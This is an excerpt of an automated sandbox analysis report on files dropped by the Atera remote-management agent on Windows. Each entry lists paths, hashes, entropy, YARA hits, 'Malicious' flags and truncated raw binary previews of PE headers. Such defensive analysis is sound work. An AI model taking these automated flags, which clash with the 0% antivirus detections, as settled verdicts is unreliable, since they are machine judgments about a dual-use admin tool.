                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Ub.X.........." ..0..8...........W... ...`....... .............................../....@.................................dW..O....`...............B..0(..........,V............................................... ............... ..H............text....7... ...8.................. ..`.rsrc........`.......:..............@..@.reloc...............@..............@..B.................W......H.......4%..p/...........T.......U......................................r~....-.(....s.........~....*..*.0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*.......%...(....*.(....,.r...p......%...%...%...(....*.......%...%...(....*..0..A.......(....,!r...p......%...%...%...%...(....*.......%...%...%...(....*2r...p.(....*......(....*2(.....(....*^~....-.(.........~....*..0..........~..........(

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.ValueTuple.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):73264
                                                                                                                                                                                                                                        Entropy (8bit):5.955263962444665
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:6784YWac+abptsy5VyYc/9n1RcGxzeeUVn9KyQgHo0JuresehaAR7HxRq6L:67N1r9KGI04CCARLq6L
                                                                                                                                                                                                                                        MD5:F0A06E07C21B485434202D325B3AA058
                                                                                                                                                                                                                                        SHA1:6E4A0A572E3CA5A5B23D4633CE63300E3BB39658
                                                                                                                                                                                                                                        SHA-256:955FD5B1B046AFC9E62E2D0CA4698818FE1357EA764977D7A9B4A44C1F657169
                                                                                                                                                                                                                                        SHA-512:B398A6A66F184193CFA635D6B5DBA9ADB391782F2A82F4609ECB161A4340DC41C82F22A98FEB69F594B7DDF9FB677711BE1FBFA4D796146550E92D22DCA14D15
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....>.Z.........." ..0.................. ... ....... .......................`............@.....................................O.... ..P...............0(...@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc...P.... ......................@..@.reloc.......@......................@..B........................H.......$...h...........................................................6..o.........*f..o...........o.........*...o...........o...........o.........*...o...........o ..........o!...........o"........*...o#..........o$..........o%...........o&...........o'........*....0..L.........o(..........o)..........o*...........o+...........o,...........o-........*.0..Y.........o...........o/..........o0...........o1...........o2...........o3...........o4.... ...*....0..k.........o5....

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\package_2.db

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe
                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 12, database pages 12, cookie 0xb, schema 4, UTF-8, version-valid-for 12
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):49152
                                                                                                                                                                                                                                        Entropy (8bit):0.9023887704079093
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:2u5C4OoNSN1eN+5NmWZDzWL8OO7QzyO+p:D5PsveM5htzy8OO7QzyO+p
                                                                                                                                                                                                                                        MD5:05DF0C7FA5C698FAD6C3F9B1F2A63074
                                                                                                                                                                                                                                        SHA1:8E268CB161A5C8B17AE8D46EEA9F23F94E1EE1EA
                                                                                                                                                                                                                                        SHA-256:F5EB98589CF7E64EEC10C69986F461B8CBB705D49083043BB75E9FA906B01D33
                                                                                                                                                                                                                                        SHA-512:ECD43ECA70342C7FADDC9893EE93D47AA6CE449864E3DDB33B3514DF8F4B04675ED9C759E5D471C893505942381B11967CBCF4D4543BCC9E7F9F8EBDCB77FF32
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................c..............Z...?.j...I.:..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\package_2.db-journal

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe
                                                                                                                                                                                                                                        File Type:SQLite Rollback Journal
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):12824
                                                                                                                                                                                                                                        Entropy (8bit):1.3827713033597246
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:7MEgfqcFu5C4OZUlFJNGdNGveXXQXN+5NG1ZJ:79gf/u5C4OoNSN1eN+5NmJ
                                                                                                                                                                                                                                        MD5:2248227D8BE0CA688B5AFCE0572C5331
                                                                                                                                                                                                                                        SHA1:C4A19FFB96B6C0634FE63CF000838AFAE4223877
                                                                                                                                                                                                                                        SHA-256:FB9D51A08ED416B8C23B2BDB489FDA786B6081750CB8A9C5DE98D0818D9E46D5
                                                                                                                                                                                                                                        SHA-512:709F4959849CE9FC889CEE14F32DBF97FA3BA68A0B60DE3E87F36AB63D9E304ACBB2944CDBF892294E1CDF7F65D40AB70798CA1018DA263938AB9CA47B34AA52
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.... .c.......4d........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\x64\SQLite.Interop.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                        Size (bytes):1799216
                                                                                                                                                                                                                                        Entropy (8bit):6.520454988999628
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24576:GuvfmOhyS2RuhV0yGzcuHpRs8ulCfUk+qKuMhUwqPevJ8QNYfjmqBBLbNFEohFY9:RHmUMohVWpu8ul0UkTgNCfyo3G
                                                                                                                                                                                                                                        MD5:CBA9D50085EE939B987CF758C727DD62
                                                                                                                                                                                                                                        SHA1:DDC0FAF68995883AC754662C59C4295BB0A64E3B
                                                                                                                                                                                                                                        SHA-256:75E47A697A46E31811FAB8C5D9FE1ABA6BA095B6D13DC79A8C848BE308917C37
                                                                                                                                                                                                                                        SHA-512:A5F3D1B96535E0B523ECD71DC36FD3AF157C630874FF11DA29066C545114D256B14A5EE2BA725679C4192182D37DF6900AA69ECE228BAFCE909A482DFF43A1E0
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............g...g...g.>.....g.>...B.g.>.....g.3.....g......g...f.^.g../....g......g......g......g.Rich..g.................PE..d.....c.........." .................n...............................................s....`.........................................`t.......e..x....`.......@..`....L..0(...p.........8...........................@...p...............`............................text...$........................... ..`.rdata..............................@..@.data...0........z..................@....pdata..`....@......................@..@.rsrc........`......................@..@.reloc...,...p......................@..B........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\x86\SQLite.Interop.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1475632
                                                                                                                                                                                                                                        Entropy (8bit):6.791868709546672
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24576:TS3uuk58wXpQous2GCzbHwGTzsIDQAKub0MBsIFBm5fi/5ATA9NTTPjXWJD8qC:6dwXpQdNVNDQubXyi60jXTW98qC
                                                                                                                                                                                                                                        MD5:3B462EFAACFAEBA904109B4FD3FE641F
                                                                                                                                                                                                                                        SHA1:6DB8785E94FDC2152895396CB9B3D3945DA5D25A
                                                                                                                                                                                                                                        SHA-256:1F9F620D4D7D32670073C335A2DC88A5A5DCFA7A5FF18E914EC6CD8EA983105F
                                                                                                                                                                                                                                        SHA-512:7295B1F7E4437729DFDAED5310EB26B5F4A8B96A2B97ADA8F8466712A69946BAADB2588071B51D661F4FD2A6029A2914E3DB73914BD2FE1C74D725F204063EF2
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?.rG^.!G^.!G^.!.._!d^.!..]!.^.!..^!.^.!.))!O^.!Y..!D^.!G^.!.^.!d.B!F^.!!.Z!F^.!!.Y!F^.!!.\!F^.!RichG^.!................PE..L...r.c...........!.........*.......:.......@............................................@.........................0B..:....5..x....................\..0(.........pB..8............................1..@............@..0............................text...p-.......................... ..`.rdata..j....@.......2..............@..@.data...tt...`...T...N..............@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates.zip

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2950466
                                                                                                                                                                                                                                        Entropy (8bit):7.998782979199986
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:49152:xbG/HdRftau56Aie0UvSxh1NcXkFuTCjCNAbhnOYqIR83DJu51lPIq6YmtzfaQgD:c/9RfogeQqVNcrTLNkIX3DJcz7SaQov
                                                                                                                                                                                                                                        MD5:A3B618CCA61ED197743E369F5F2EC0F2
                                                                                                                                                                                                                                        SHA1:B960C72ED47514479432931852EE251BA2BB7C05
                                                                                                                                                                                                                                        SHA-256:3C1AEA4F44A249649C8B3773E29DB5F4AC940E6BBCB48990151F1879CB7370F9
                                                                                                                                                                                                                                        SHA-512:7DEEC849ABE74AA16FF54B265C00CC01C860D7B4A3F99B10ED64D7BB552991C7CC621A9857DAD5F85A9E3B00FD04D028B1599E678C6FC335FD8FC2DC807A5443
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:PK..-......n.Y..7Z........6...AgentPackageOsUpdates/AgentPackageOsUpdates.Common.dll....(r......G?......;........,p..7P2r.V.\.t_@.=..-.._.R....]....a$...D......4.s.(`.A.<....O\.t~...DS....'....z...........a..xC.j..:.?.2...@.?g..@.V}.....K=g9B2....\...P.L........o....9`.Q.>V`..C&..-48....X3..X2J..oID.....mS..V...2..[..Uv.U]..lI..W.k..i.Sj.Q*.cg=.N.`.{0w.c....0...H../......V2...jA...y.D=..FiL.E....r.=Qj.h+...:.I.m.......O.......e.$.V..z..p.A. y.F..9?..q...6.m..{..q..DA...y.#0......w.{!..B-.....m..'Q4M...........g.F...<..X..+3D......r...o|.....K0...3..6.......v)............>.Q.........Xl..gCu.'./..7....`.Jr.......y..i...9.x-m.Pb.T.l.R#...ewg....L%j.6t...=.H.......^,&dX......cZ..ag....H&.R..".^....v.e.@....v.../...%9@=..~N...".._.+56....q..Z{...N%U^.d|,.K]s.@[.2.....Q..*.8.._.....~.V.+t.~....g!...p\8c.1...I...9j?.\.p.7....,d.....#..P..aN...5.].._7..5..O.......I`..s'....6..H...,..d.."(`.....&....l@.._...G.4T..Z7....o.6...u.(.a.-...h\.e.h.j6.L..O

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.Common.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):29224
                                                                                                                                                                                                                                        Entropy (8bit):6.376388174256496
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:qpWI4FJ1CsZ1pL375SImXkmlkgGIW2W8f8Mn0DpQ8fz0m1NNyb8E9VF6IYijSJIc:UlexZT375i0qvT+b7z1pEpYi606v
                                                                                                                                                                                                                                        MD5:D8ACFFF68AB2B25E2BEBEACB8C26C594
                                                                                                                                                                                                                                        SHA1:B2B0BFD6C0B90495B0013D6F69144E1F841675F9
                                                                                                                                                                                                                                        SHA-256:DAF53A130F257E647ABFF99A883891B616C5AA6EDB8E81B1CC30F4CFDC910DD2
                                                                                                                                                                                                                                        SHA-512:E6AA3E8C054913BDF10F7998927E95F1E3F8AE67A570F648358954AF874ACF9F415BE712969C90F64B6C433FB0AE5AAACE87C780769DBC1B669FD11F79051A37
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.Common.dll, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..@..........N_... ...`....... ....................................`..................................^..O....`...............J..((..........@^..8............................................ ............... ..H............text...T?... ...@.................. ..`.rsrc........`.......B..............@..@.reloc...............H..............@..B................-_......H........*..`3..........................................................:.(......}....*..0..X.........(.......o......-.....>....o......2.,..o......,..o.......{....r...p...(....o..........*.(.......$..........&...........88.......0..M.........(......-.(...+..8.o....../.,..o.......{....r{..p.......(....o....(...+....*.......................&&.%.....0..].......~......o......-.~.....o..........o.....o........{....r...p......%...%...%...%...( ...o......*....................0..O...

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.Common.dll.config

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2006
                                                                                                                                                                                                                                        Entropy (8bit):5.012466327549389
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:327h+1/gF27RgdSagFsg+w3jdgDSg+CagFPr7:K4Mw9cr7
                                                                                                                                                                                                                                        MD5:DE33D7BC716E96683CCAEC7E3DECC54B
                                                                                                                                                                                                                                        SHA1:6CAC5E2AE17A91F55760F3652DD1D954CFE34848
                                                                                                                                                                                                                                        SHA-256:E9EC2DB29E1A7F44D6FAD976E29627E2EBCC1C9FD1797D56A69106260B70B65D
                                                                                                                                                                                                                                        SHA-512:353BF5BC4E47C7218CD3EECEE83301950FAA7D48644BEA3FE2F47B5AB432D43B466EBCF8E1A1911923EC423D30682A8FA42A3EA878E7D85C8E91EC841543B887
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Microsoft.ApplicationInsights" publicKeyToken="31bf3856ad364e35" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-2.22.0.997" newVersion="2.22.0.997" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Runtime.CompilerServices.Unsafe" publicKeyToken="b03f5f7f11d50a3a" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Buffers" publicKeyToken="cc7b13ffcd

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):201256
                                                                                                                                                                                                                                        Entropy (8bit):5.752384757578713
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:cwfnZYi3KYU6yLRgNZiVTC5dlwuIT2tl/pRLrPd3iqiTjw7RuHM6:FPZYJXINZCg/pJLNiqiTjSRg
                                                                                                                                                                                                                                        MD5:CDE6BA86139AE458ABC24DAD31A66465
                                                                                                                                                                                                                                        SHA1:36D1DF0BF16CC0EEDEA3118EC9993A3E6B0A65A5
                                                                                                                                                                                                                                        SHA-256:0FD22D6CDCD306538D9AD6E49A2CC4C2D6CC1D413097483B526419E55DD3FE09
                                                                                                                                                                                                                                        SHA-512:F4119BCA8C17697B3070E47BA672E0CE0A6AD4A4C0D358E6EE474DA02CC560A8B8FBEC8F17085DFA602D93FEDF2B422F70C2CC4C9AE6319CA6711BF220D56F7C
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.exe, Author: Joe Security
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Uy..........."...0.................. ........@.. .......................@............`.....................................O.......4...............((... ...... ...8............................................ ............... ..H............text...$.... ...................... ..`.rsrc...4...........................@..@.reloc....... ......................@..B........................H...........D&............................................................{....*..{....*V.(......}......}....*...0..A........u........4.,/(.....{.....{....o....,.(.....{.....{....o....*.*.*. K.. )UU.Z(.....{....o ...X )UU.Z(.....{....o!...X*...0..b........r...p......%..{.......%q.........-.&.+.......o"....%..{.......%q.........-.&.+.......o"....(#...*..{$...*..{%...*..{&...*..{'...*..{(...*..{)...*..(......}$.....}%.....}&......}'......}(......})...*..0...........u.......;..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.exe.config

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1780
                                                                                                                                                                                                                                        Entropy (8bit):5.027025756159462
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:3rrL7h+1/gFSagFsg+w327RgdSg+CjdgDt:7r34owoR
                                                                                                                                                                                                                                        MD5:09CDFC3063DEC485A3C48111D5CEE297
                                                                                                                                                                                                                                        SHA1:02CEFEC66B6B2EEE120F97493D438F3B270AB5CA
                                                                                                                                                                                                                                        SHA-256:0ACF70AE533AF7D079F370AB3102B9563CA4C447C5DFC7A20C88AABE04295C01
                                                                                                                                                                                                                                        SHA-512:CA39056F79EFC8CE050FCCE1AAC21B2E7B62E65A0521E3CABF90C58A7249107658C2D208706FEC456CCC74D58DCDC22E23ECBAA43684613D4826505A426E1CB7
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>..<startup><supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5.2" /></startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Microsoft.ApplicationInsights" publicKeyToken="31bf3856ad364e35" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-2.22.0.997" newVersion="2.22.0.997" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Runtime.CompilerServices.Unsafe" publicKeyToken="b03f5f7f11d50a3a" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Buffers" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-4.0.3.0" newVersion="4.0.3.0" />.. </dependentAssembly>.. <depend

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.ini

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):12
                                                                                                                                                                                                                                        Entropy (8bit):3.584962500721156
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:WhWB:Wo
                                                                                                                                                                                                                                        MD5:6473ED6D0D25B902FD8B7CEE34B2D260
                                                                                                                                                                                                                                        SHA1:5D0890CB19224079F6581D88C15B24E554364771
                                                                                                                                                                                                                                        SHA-256:1BEAAB7D9B210D794011D33238AA883B2A9A60FCD58A7FD6C29203289363392B
                                                                                                                                                                                                                                        SHA-512:543699EEB71F06DF84B401FC98AFB8CA6EE3A9E9D5F9B6FCCE54277CABA6CDCE100CCCFD2E310A30F274E73F2BBA161C5886D5599DEFA99CCC324540F074B265
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:version=30.2

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Atera.AgentPackage.Common.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):102440
                                                                                                                                                                                                                                        Entropy (8bit):6.190411276623129
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:xPAt6+FT+ZGodV5iYbYSWd85e+ZS5sSak42QhLks2OLv476GC:x2bYbYSWd85I5sSakFQhHLv4O
                                                                                                                                                                                                                                        MD5:7AE1430949A1C56AD042961653762263
                                                                                                                                                                                                                                        SHA1:75791D6326D7C82FDB27C680468D18C3F6B2DFF5
                                                                                                                                                                                                                                        SHA-256:38F922198A9B6557697F343C7024F542917D3098587F1FC9E9C755FFEC7D8852
                                                                                                                                                                                                                                        SHA-512:5338078891957549DFB64314ECBB798C389CBBBD6BBD258E98E4B865E6C2473AAB236078BECB742DD173A776A4A7B9A30C2936F558817CAFCFCC5C0358D9D520
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5*f.........." ..0..^...........}... ........... ...............................C....`.................................`}..O.......8............h..((..........(|............................................... ............... ..H............text....]... ...^.................. ..`.rsrc...8............`..............@..@.reloc...............f..............@..B.................}......H........s..|............................................................0..>.......~........o....~......(....&.s.......&...~....(....,..(....&..*...........$...........'........(....*.......*.0..4.......(....o....r...p(....r...p(..........(....(......&..*........00......:.(......}....*..0..Z............( ...,......(!...*~..........("........( ...-..(....s#...........,..($.........(!...*..........&E.......0..G........{....,.(......5~%...r'..po&...rm..pr...po'...tR...r...p((..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Atera.AgentPackages.CommonLib.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):95272
                                                                                                                                                                                                                                        Entropy (8bit):5.996467833078292
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:B4aRSNSrXS5EaKoDMsUVl0HAWMco2bJkjUB766K:B4auS7S5Ea6WMcpuUBQ
                                                                                                                                                                                                                                        MD5:DBE2521C43EAD76AA4BEB5B9C7D2F59A
                                                                                                                                                                                                                                        SHA1:792146B5EFD12DDDBADCAE9347C5919C49438E2B
                                                                                                                                                                                                                                        SHA-256:FC0AE3A42341726D460309967DC68EC1BE492F2E88011D23049478BD55119859
                                                                                                                                                                                                                                        SHA-512:1348C8D391D5EE4DD38F5F69CFFEF01F30916E3C1F184BD23F7E088C24F1C19D121080FD2DADECAE09EB8DAADB6F2690C3C53B527011A0E45CDDF73F7308CB39
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Atera.AgentPackages.CommonLib.dll, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Atera.AgentPackages.CommonLib.dll, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Atera.AgentPackages.CommonLib.dll, Author: Joe Security
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....=$..........." ..0..B..........b`... ........... ...................................`..................................`..O.......4............L..((..........h_..8............................................ ............... ..H............text...h@... ...B.................. ..`.rsrc...4............D..............@..@.reloc...............J..............@..B................A`......H.......Lh................................................................(......}......}.......}.......}........o<...}....*..{....*>.{....o.......*v.{....o...........s....(...+*...0..<........{....o.....{....#.......@(....o.....{......o........&.....*........55........{....o.....{....#.......@(....o.....{......o....*..0..$........(......`...%..".o......{.....o....*Z.(....r...po ...o....*..{....o/...r...p.(....(....o%...*6..(....o....*..{....*..{....*.s....z.s....z.s....z.s..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Atera.AgentPackages.Exceptions.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):16424
                                                                                                                                                                                                                                        Entropy (8bit):6.655011797541533
                                                                                                                                                                                                                                        Encrypted:false
